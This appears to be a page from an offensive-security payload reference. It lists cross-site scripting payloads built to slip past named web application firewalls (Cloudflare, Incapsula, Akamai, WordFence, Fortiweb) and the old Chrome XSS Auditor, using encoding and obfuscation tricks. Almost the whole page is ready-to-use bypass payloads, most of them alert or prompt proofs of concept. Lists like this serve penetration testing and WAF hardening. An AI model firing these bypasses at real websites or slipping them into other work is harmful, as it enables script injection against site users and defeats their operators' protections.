153 Payloads
15 Wordlists

XSS Injection Payloads & Testing Methodology

Cross-Site Scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS allows attackers to inject malicious code into a website, which is then executed in the browser of anyone w...

Common WAF Bypass#

WAFs are designed to filter out malicious content by inspecting incoming and outgoing traffic for patterns indicative of attacks. Despite their sophistication, WAFs often struggle to keep up with the diverse methods attackers use to obfuscate and modify their payloads to circumvent detection.

Summary#

Cloudflare#

js2 lines
    <svg/onrandom=random onload=confirm(1)>
    <video onnull=null onmouseover=confirm(1)>
js1 line
    <svg/OnLoad="`${prompt``}`">
js1 line
    <svg/onload=%26nbsp;alert`bohdan`+
js1 line
    1'"><img/src/onerror=.1|alert``>
js3 lines
    <svg onload=prompt%26%230000000040document.domain)>
    <svg onload=prompt%26%23x000000028;document.domain)>
    xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
  • 22nd March 2019 - @RakeshMane10
js1 line
    <svg/onload=&#97&#108&#101&#114&#00116&#40&#41&#x2f&#x2f
  • 27th February 2018
html1 line
    <a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;">X</a>

Chrome Auditor#

NOTE: Chrome Auditor is deprecated and removed on latest version of Chrome and Chromium Browser.

  • 9th August 2018
javascript1 line
    </script><svg><script>alert(1)-%26apos%3B

Incapsula WAF#

js1 line
    <svg onload\r\n=$.globalEval("al"+"ert()");>
javascript2 lines
    anythinglr00</script><script>alert(document.domain)</script>uxldz
    anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
javascript1 line
    <object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>

Akamai WAF#

javascript1 line
    ?"></script><base%20c%3D=href%3Dhttps:\mysite>
svg1 line
    <dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>

WordFence WAF#

html1 line
    <a href=javas&#99;ript:alert(1)>

Fortiweb WAF#

javascript1 line
    \u003e\u003c\u0068\u0031 onclick=alert('1')\u003e